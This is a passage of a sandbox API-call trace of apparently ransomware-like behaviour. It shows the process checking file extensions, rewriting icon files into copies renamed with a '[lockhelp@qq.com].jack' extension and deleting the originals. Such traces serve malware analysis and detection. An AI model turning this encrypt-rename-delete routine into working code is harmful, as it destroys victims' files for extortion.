[0197.752] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.752] lstrlenW (lpString=".docx") returned 5 [0197.752] lstrcmpiW (lpString1=".docx", lpString2="p.ico") returned -1 [0197.752] lstrlenW (lpString=".pdf") returned 4 [0197.752] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.752] lstrlenW (lpString=".xls") returned 4 [0197.752] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.752] lstrlenW (lpString=".xlsx") returned 5 [0197.752] lstrcmpiW (lpString1=".xlsx", lpString2="p.ico") returned -1 [0197.752] lstrlenW (lpString=".ppt") returned 4 [0197.752] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.752] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0197.752] lstrlenW (lpString=".zip") returned 4 [0197.752] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.752] lstrlenW (lpString=".rar") returned 4 [0197.752] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.752] lstrlenW (lpString=".bz2") returned 4 [0197.752] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.752] lstrlenW (lpString=".7z") returned 3 [0197.752] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.752] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0197.752] lstrlenW (lpString=".dbf") returned 4 [0197.752] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.753] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0197.753] lstrlenW (lpString=".1cd") returned 4 [0197.753] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.753] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0197.753] lstrlenW (lpString=".jpg") returned 4 [0197.753] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.753] lstrcmpiW (lpString1=".ico", lpString2=".jack") returned -1 [0197.753] lstrlenW (lpString="stop.ico") returned 8 [0197.753] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0197.753] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=10134) returned 1 [0197.753] CloseHandle (hObject=0x3f8) returned 1 [0197.753] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico")) returned 0x80 [0197.753] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.754] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0197.754] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.754] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.754] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0197.754] GetLastError () returned 0x0 [0197.754] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x2796, lpOverlapped=0x0) returned 1 [0197.756] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x27a0, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x27a0, lpOverlapped=0x0) returned 1 [0197.756] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.757] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.757] SetEndOfFile (hFile=0x41c) returned 1 [0197.757] CloseHandle (hObject=0x41c) returned 1 [0197.757] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.757] SetEndOfFile (hFile=0x3f8) returned 1 [0197.758] CloseHandle (hObject=0x3f8) returned 1 [0197.758] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.758] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico")) returned 1 [0197.759] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0197.759] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0197.759] lstrlenW (lpString=".doc") returned 4 [0197.759] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.759] lstrlenW (lpString=".docx") returned 5 [0197.759] lstrcmpiW (lpString1=".docx", lpString2="p.ico") returned -1 [0197.759] lstrlenW (lpString=".pdf") returned 4 [0197.759] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.759] lstrlenW (lpString=".xls") returned 4 [0197.759] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.759] lstrlenW (lpString=".xlsx") returned 5 [0197.759] lstrcmpiW (lpString1=".xlsx", lpString2="p.ico") returned -1 [0197.759] lstrlenW (lpString=".ppt") returned 4 [0197.759] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.759] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0197.759] lstrlenW (lpString=".zip") returned 4 [0197.759] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.759] lstrlenW (lpString=".rar") returned 4 [0197.759] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.759] lstrlenW (lpString=".bz2") returned 4 [0197.759] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.759] lstrlenW (lpString=".7z") returned 3 [0197.759] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.759] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0197.759] lstrlenW (lpString=".dbf") returned 4 [0197.759] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.759] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0197.759] lstrlenW (lpString=".1cd") returned 4 [0197.759] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.759] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0197.759] lstrlenW (lpString=".jpg") returned 4 [0197.760] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.760] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0197.760] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0197.760] lstrlenW (lpString=".doc") returned 4 [0197.760] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.760] lstrlenW (lpString=".docx") returned 5 [0197.760] lstrcmpiW (lpString1=".docx", lpString2="p.ico") returned -1 [0197.760] lstrlenW (lpString=".pdf") returned 4 [0197.760] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.760] lstrlenW (lpString=".xls") returned 4 [0197.760] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.760] lstrlenW (lpString=".xlsx") returned 5 [0197.760] lstrcmpiW (lpString1=".xlsx", lpString2="p.ico") returned -1 [0197.760] lstrlenW (lpString=".ppt") returned 4 [0197.760] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.760] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0197.760] lstrlenW (lpString=".zip") returned 4 [0197.760] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.760] lstrlenW (lpString=".rar") returned 4 [0197.760] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.760] lstrlenW (lpString=".bz2") returned 4 [0197.760] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.760] lstrlenW (lpString=".7z") returned 3 [0197.760] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.760] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0197.760] lstrlenW (lpString=".dbf") returned 4 [0197.760] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.760] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0197.760] lstrlenW (lpString=".1cd") returned 4 [0197.760] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.760] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0197.760] lstrlenW (lpString=".jpg") returned 4 [0197.760] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.761] lstrcmpiW (lpString1=".ico", lpString2=".jack") returned -1 [0197.761] lstrlenW (lpString="SysReqMet.ico") returned 13 [0197.761] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0197.761] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=1150) returned 1 [0197.761] CloseHandle (hObject=0x3f8) returned 1 [0197.761] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico")) returned 0x80 [0197.761] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.761] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0197.761] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.761] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.761] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0197.761] GetLastError () returned 0x0 [0197.761] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x47e, lpOverlapped=0x0) returned 1 [0197.764] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x480, lpOverlapped=0x0) returned 1 [0197.765] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.765] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xee, lpOverlapped=0x0) returned 1 [0197.765] SetEndOfFile (hFile=0x41c) returned 1 [0197.765] CloseHandle (hObject=0x41c) returned 1 [0197.766] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.766] SetEndOfFile (hFile=0x3f8) returned 1 [0197.767] CloseHandle (hObject=0x3f8) returned 1 [0197.767] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.767] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico")) returned 1 [0197.767] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0197.767] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0197.767] lstrlenW (lpString=".doc") returned 4 [0197.767] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.767] lstrlenW (lpString=".docx") returned 5 [0197.767] lstrcmpiW (lpString1=".docx", lpString2="t.ico") returned -1 [0197.767] lstrlenW (lpString=".pdf") returned 4 [0197.767] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.767] lstrlenW (lpString=".xls") returned 4 [0197.767] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.768] lstrlenW (lpString=".xlsx") returned 5 [0197.768] lstrcmpiW (lpString1=".xlsx", lpString2="t.ico") returned -1 [0197.768] lstrlenW (lpString=".ppt") returned 4 [0197.768] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.768] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0197.768] lstrlenW (lpString=".zip") returned 4 [0197.768] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.768] lstrlenW (lpString=".rar") returned 4 [0197.768] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.768] lstrlenW (lpString=".bz2") returned 4 [0197.768] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.768] lstrlenW (lpString=".7z") returned 3 [0197.768] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.768] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0197.768] lstrlenW (lpString=".dbf") returned 4 [0197.768] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.768] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0197.768] lstrlenW (lpString=".1cd") returned 4 [0197.768] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.768] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0197.768] lstrlenW (lpString=".jpg") returned 4 [0197.768] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.768] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0197.768] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0197.768] lstrlenW (lpString=".doc") returned 4 [0197.768] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.768] lstrlenW (lpString=".docx") returned 5 [0197.768] lstrcmpiW (lpString1=".docx", lpString2="t.ico") returned -1 [0197.768] lstrlenW (lpString=".pdf") returned 4 [0197.768] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.768] lstrlenW (lpString=".xls") returned 4 [0197.768] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.769] lstrlenW (lpString=".xlsx") returned 5 [0197.769] lstrcmpiW (lpString1=".xlsx", lpString2="t.ico") returned -1 [0197.769] lstrlenW (lpString=".ppt") returned 4 [0197.769] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.769] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0197.769] lstrlenW (lpString=".zip") returned 4 [0197.769] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.769] lstrlenW (lpString=".rar") returned 4 [0197.769] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.769] lstrlenW (lpString=".bz2") returned 4 [0197.769] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.769] lstrlenW (lpString=".7z") returned 3 [0197.769] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.769] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0197.769] lstrlenW (lpString=".dbf") returned 4 [0197.769] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.769] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0197.769] lstrlenW (lpString=".1cd") returned 4 [0197.769] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.769] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0197.769] lstrlenW (lpString=".jpg") returned 4 [0197.769] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.769] lstrcmpiW (lpString1=".ico", lpString2=".jack") returned -1 [0197.769] lstrlenW (lpString="SysReqNotMet.ico") returned 16 [0197.769] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0197.770] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=1150) returned 1 [0197.770] CloseHandle (hObject=0x3f8) returned 1 [0197.770] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico")) returned 0x80 [0197.770] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.770] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0197.770] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.770] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.770] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0197.770] GetLastError () returned 0x0 [0197.770] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x47e, lpOverlapped=0x0) returned 1 [0198.172] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x480, lpOverlapped=0x0) returned 1 [0198.173] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.173] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xf4, lpOverlapped=0x0) returned 1 [0198.173] SetEndOfFile (hFile=0x41c) returned 1 [0198.173] CloseHandle (hObject=0x41c) returned 1 [0198.177] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.177] SetEndOfFile (hFile=0x3f8) returned 1 [0198.178] CloseHandle (hObject=0x3f8) returned 1 [0198.178] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0198.178] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico")) returned 1 [0198.178] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0198.178] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0198.178] lstrlenW (lpString=".doc") returned 4 [0198.178] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0198.179] lstrlenW (lpString=".docx") returned 5 [0198.179] lstrcmpiW (lpString1=".docx", lpString2="t.ico") returned -1 [0198.179] lstrlenW (lpString=".pdf") returned 4 [0198.179] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0198.179] lstrlenW (lpString=".xls") returned 4 [0198.179] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0198.179] lstrlenW (lpString=".xlsx") returned 5 [0198.179] lstrcmpiW (lpString1=".xlsx", lpString2="t.ico") returned -1 [0198.179] lstrlenW (lpString=".ppt") returned 4 [0198.179] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0198.179] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0198.179] lstrlenW (lpString=".zip") returned 4 [0198.179] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0198.179] lstrlenW (lpString=".rar") returned 4 [0198.179] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0198.179] lstrlenW (lpString=".bz2") returned 4 [0198.179] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0198.179] lstrlenW (lpString=".7z") returned 3 [0198.179] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0198.179] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0198.179] lstrlenW (lpString=".dbf") returned 4 [0198.179] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0198.179] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0198.179] lstrlenW (lpString=".1cd") returned 4 [0198.179] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0198.179] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0198.179] lstrlenW (lpString=".jpg") returned 4 [0198.179] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0198.180] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0198.180] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0198.180] lstrlenW (lpString=".doc") returned 4 [0198.180] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0198.180] lstrlenW (lpString=".docx") returned 5 [0198.180] lstrcmpiW (lpString1=".docx", lpString2="t.ico") returned -1 [0198.180] lstrlenW (lpString=".pdf") returned 4 [0198.180] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0198.180] lstrlenW (lpString=".xls") returned 4 [0198.180] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0198.180] lstrlenW (lpString=".xlsx") returned 5 [0198.180] lstrcmpiW (lpString1=".xlsx", lpString2="t.ico") returned -1 [0198.180] lstrlenW (lpString=".ppt") returned 4 [0198.180] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0198.180] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0198.180] lstrlenW (lpString=".zip") returned 4 [0198.180] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0198.180] lstrlenW (lpString=".rar") returned 4 [0198.180] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0198.180] lstrlenW (lpString=".bz2") returned 4 [0198.180] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0198.180] lstrlenW (lpString=".7z") returned 3 [0198.180] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0198.180] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0198.180] lstrlenW (lpString=".dbf") returned 4 [0198.180] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0198.180] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0198.180] lstrlenW (lpString=".1cd") returned 4 [0198.180] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0198.180] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0198.181] lstrlenW (lpString=".jpg") returned 4 [0198.181] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0198.181] lstrcmpiW (lpString1=".msi", lpString2=".jack") returned 1 [0198.181] lstrlenW (lpString="netfx_Core_x86.msi") returned 18 [0198.181] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0198.182] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=1163264) returned 1 [0198.182] CloseHandle 